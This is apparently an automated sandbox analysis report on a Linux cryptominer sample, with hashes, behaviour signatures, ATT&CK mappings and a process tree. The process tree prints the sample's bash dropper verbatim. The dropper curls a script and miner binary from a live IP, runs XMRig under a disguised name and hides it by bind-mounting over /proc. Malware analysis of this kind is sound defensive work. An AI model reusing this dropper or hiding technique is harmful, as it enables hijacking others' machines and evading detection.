Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
18/10/2024, 01:38
Static task
static1
Behavioral task
behavioral1
Sample
481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
-
Size
15KB
-
MD5
aee014a523b65c8d3b7bdb92765d305c
-
SHA1
dfb9d0cada5cf03c3dfa4479865955311e6a54f9
-
SHA256
481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282
-
SHA512
4b9d43d58bd6ff61dc563d55dea121f94040ab24137154f2dfe03b342c8ae96676ca438302ff7d63b68d4e34bb8bcdd94909cb56002d3feef73820ca8b3969d8
-
SSDEEP
384:Zr+Ken0Xvn/3PHfXvn/3PHfayqC6UNwA42KW9XxqZeMm:s90Xvn/3PHfXvn/3PHfayqC6U+6XxqgR
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/fstream-3.dat family_xmrig behavioral1/files/fstream-3.dat xmrig -
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1604 bash 1616 chmod 1628 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /root/.sysemd/sysemd 1631 sysemd -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name sysemd File opened for reading /sys/devices/virtual/dmi/id/board_vendor sysemd File opened for reading /sys/devices/virtual/dmi/id/bios_vendor sysemd File opened for reading /sys/devices/virtual/dmi/id/sys_vendor sysemd -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_version sysemd File opened for reading /sys/devices/virtual/dmi/id/product_serial sysemd File opened for reading /sys/devices/virtual/dmi/id/board_version sysemd File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag sysemd File opened for reading /sys/devices/virtual/dmi/id/product_uuid sysemd File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor sysemd File opened for reading /sys/devices/virtual/dmi/id/chassis_version sysemd File opened for reading /sys/devices/virtual/dmi/id/chassis_serial sysemd File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag sysemd File opened for reading /sys/devices/virtual/dmi/id/board_name sysemd File opened for reading /sys/devices/virtual/dmi/id/board_serial sysemd File opened for reading /sys/devices/virtual/dmi/id/chassis_type sysemd File opened for reading /sys/devices/virtual/dmi/id/bios_version sysemd File opened for reading /sys/devices/virtual/dmi/id/bios_date sysemd -
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo sysemd -
Reads CPU attributes 1 TTPs 46 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id sysemd File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id sysemd File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity sysemd File opened for reading /sys/devices/system/cpu/possible sysemd File opened for reading /sys/devices/system/cpu/online top File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size sysemd File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency sysemd File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus sysemd File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/online sysemd File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size sysemd File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type sysemd -
Enumerates kernel/hardware configuration 1 TTPs 27 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/cgroup/cpuset.mems.effective sysemd File opened for reading /sys/kernel/mm/hugepages sysemd File opened for reading /sys/devices/system/node/node0/hugepages sysemd File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages sysemd File opened for reading /sys/devices/system/cpu top File opened for reading /sys/fs/cgroup/cgroup.controllers sysemd File opened for reading /sys/devices/system/node/node0/access0/initiators sysemd File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth sysemd File opened for reading /sys/devices/system/cpu sysemd File opened for reading /sys/devices/system/node/online sysemd File opened for reading /sys/devices/virtual/dmi/id sysemd File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages sysemd File opened for reading /sys/devices/system/node/node0/meminfo sysemd File opened for reading /sys/devices/system/node/node0/cpumap sysemd File opened for reading /sys/devices/system/node top File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages sysemd File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages sysemd File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages sysemd File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth sysemd File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency sysemd File opened for reading /sys/firmware/dmi/tables/smbios_entry_point sysemd File opened for reading /sys/firmware/dmi/tables/DMI sysemd File opened for reading /sys/fs/cgroup/cpuset.cpus.effective sysemd File opened for reading /sys/devices/system/node/node0/meminfo top File opened for reading /sys/bus/dax/devices sysemd File opened for reading /sys/devices/system/node/node0/access1/initiators sysemd File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency sysemd -
description ioc Process File opened for reading /proc/1077/statm top File opened for reading /proc/1096/stat top File opened for reading /proc/1111/stat top File opened for reading /proc/1205/stat top File opened for reading /proc/1209/statm top File opened for reading /proc/1271/stat top File opened for reading /proc/19/stat top File opened for reading /proc/93/stat top File opened for reading /proc/109/statm top File opened for reading /proc/521/statm top File opened for reading /proc/584/statm top File opened for reading /proc/771/stat top File opened for reading /proc/967/stat top File opened for reading /proc/979/stat top File opened for reading /proc/25/statm top File opened for reading /proc/94/stat top File opened for reading /proc/1197/stat top File opened for reading /proc/1030/statm top File opened for reading /proc/1311/statm top File opened for reading /proc/1326/statm top File opened for reading /proc/95/stat top File opened for reading /proc/590/stat top File opened for reading /proc/404/statm top File opened for reading /proc/1160/statm top File opened for reading /proc/1180/statm top File opened for reading /proc/1398/stat top File opened for reading /proc/76/stat top File opened for reading /proc/89/statm top File opened for reading /proc/85/stat top File opened for reading /proc/215/statm top File opened for reading /proc/307/stat top File opened for reading /proc/412/statm top File opened for reading /proc/629/stat top File opened for reading /proc/1632/stat top File opened for reading /proc/self/auxv top File opened for reading /proc/27/stat top File opened for reading /proc/85/statm top File opened for reading /proc/93/statm top File opened for reading /proc/664/stat top File opened for reading /proc/1041/stat top File opened for reading /proc/1398/statm top File opened for reading /proc/1426/statm top File opened for reading /proc/self/stat top File opened for reading /proc/8/statm top File opened for reading /proc/1640/statm top File opened for reading /proc/112/stat top File opened for reading /proc/588/stat top File opened for reading /proc/633/stat top File opened for reading /proc/839/statm top File opened for reading /proc/1055/stat top File opened for reading /proc/1118/statm top File opened for reading /proc/17/stat top File opened for reading /proc/81/statm top File opened for reading /proc/1590/statm top File opened for reading /proc/1641/statm top File opened for reading /proc/1155/statm top File opened for reading /proc/1188/stat top File opened for reading /proc/1077/stat top File opened for reading /proc/1281/statm top File opened for reading /proc/216/stat top File opened for reading /proc/628/statm top File opened for reading /proc/109/stat top File opened for reading /proc/113/statm top File opened for reading /proc/958/stat top
Processes
-
/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf1⤵PID:1604
-
/bin/bash/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c "exec '/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf' \"\$@\"" /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf1⤵PID:1604
-
/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf1⤵PID:1604
-
/bin/bash/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c " #!/bin/bash cpu_num=`grep -c \"model name\" /proc/cpuinfo` cpu_used=`expr \$cpu_num / 2` #echo \$s dir=\$(pwd) if [ `whoami` = \"root\" ];then cd ~ && mkdir .sysemd >/dev/null 2>&1 cd .sysemd >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 n=\$(cat .num) kill -9 \$n >/dev/null 2>&1 curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh && chmod +x go.sh sleep 1 sed -i \"3s/20/\${cpu_used}/\" go.sh curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd && chmod +x sysemd sleep 1 sh go.sh sleep 3 pid=\$(top -b -n1 | grep sysemd | head -1 | awk '{print \$1}') echo \$pid > .num mount -o bind /tmp /proc/\$pid >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 fi " /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf1⤵
- File and Directory Permissions Modification
PID:1604 -
/usr/bin/grepgrep -c "model name" /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1605
-
-
/usr/bin/exprexpr 1 / 22⤵PID:1606
-
-
/usr/bin/whoamiwhoami2⤵PID:1608
-
-
/usr/bin/mkdirmkdir .sysemd2⤵PID:1609
-
-
/usr/bin/rmrm -f go.sh sysemd2⤵PID:1610
-
-
/usr/bin/catcat .num2⤵PID:1611
-
-
/usr/bin/curlcurl -s http://104.168.101.23:1234/crack/go.sh -o go.sh2⤵PID:1612
-
-
/usr/bin/chmodchmod +x go.sh2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/usr/bin/sleepsleep 12⤵PID:1617
-
-
/usr/bin/sedsed -i 3s/20/0/ go.sh2⤵PID:1618
-
-
/usr/bin/curlcurl -s http://104.168.101.23:1234/crack/sysemd -o sysemd2⤵PID:1619
-
-
/usr/bin/chmodchmod +x sysemd2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/usr/bin/sleepsleep 12⤵PID:1629
-
-
/usr/bin/shsh go.sh2⤵PID:1630
-
/root/.sysemd/sysemd./sysemd -o 104.168.101.23:34512 -t 0 -p xm3 --randomx-1gb-pages -k -B3⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1631
-
-
-
/usr/bin/sleepsleep 32⤵PID:1633
-
-
/usr/bin/grepgrep sysemd2⤵PID:1642
-
-
/usr/bin/toptop -b -n12⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1641
-
-
/usr/bin/headhead -12⤵PID:1643
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1644
-
-
/usr/bin/mountmount -o bind /tmp /proc/16322⤵PID:1645
-
-
/usr/bin/rmrm -f go.sh sysemd2⤵PID:1647
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5679359fe74d809a6564f60e75585ed3b
SHA17f114e9dc091154c365576d4702a63392f88704e
SHA256d05dd95f7ec068988015cb6c4536510191eaba0ebbd7a6c9feb55c73650cc698
SHA5129b493b0a9a67bcb95df947fc628ab7366ed6f5136267782dc0c967063244b5e4acacc32a22242b8fc506f22cdfe91eb802165e4c7d12e07de79563453f3e05a7
-
Filesize
87B
MD5496b34eb065a5f2a4b2455f207d890b2
SHA1dc170fb3d571ef0b238e33fcae8c2bc50e1e4fd1
SHA256728055874a80558d3900fded78c97584d4728e1bd9124db9d20b8953edacb8c4
SHA512f9774855d64f46b232f93601430db18bd470067372a09c3933d19ca19658eb21d9c6d4f4d1ef49a7e1d0526e6f67d40d9e33e54c8f0867050c0d348635b19e47
-
Filesize
86B
MD56bcf2d2ea1ceb1766c5bfbf8728a57e3
SHA1e542eee55d92c4f5e3fbb86c244edf04afdfee22
SHA25653bff9f21bdaa669c662f3d9c3a4d7f236e063f75ce418874d55674ea6125796
SHA51200d0dd6643a22d7e63a559a5dd7f48cd61f26a5c214e308fbd3dcb6a1238d553f89f7af51a92465004b117b9cd08c1df2c2e46875f5a8f61ed467dc87cd9b598
-
Filesize
6.7MB
MD58f633ade35df4f992eb28a2c5bc37cef
SHA16b2fe529339896b22328dec8936219e7b8e3252f
SHA256364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c
SHA5128073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73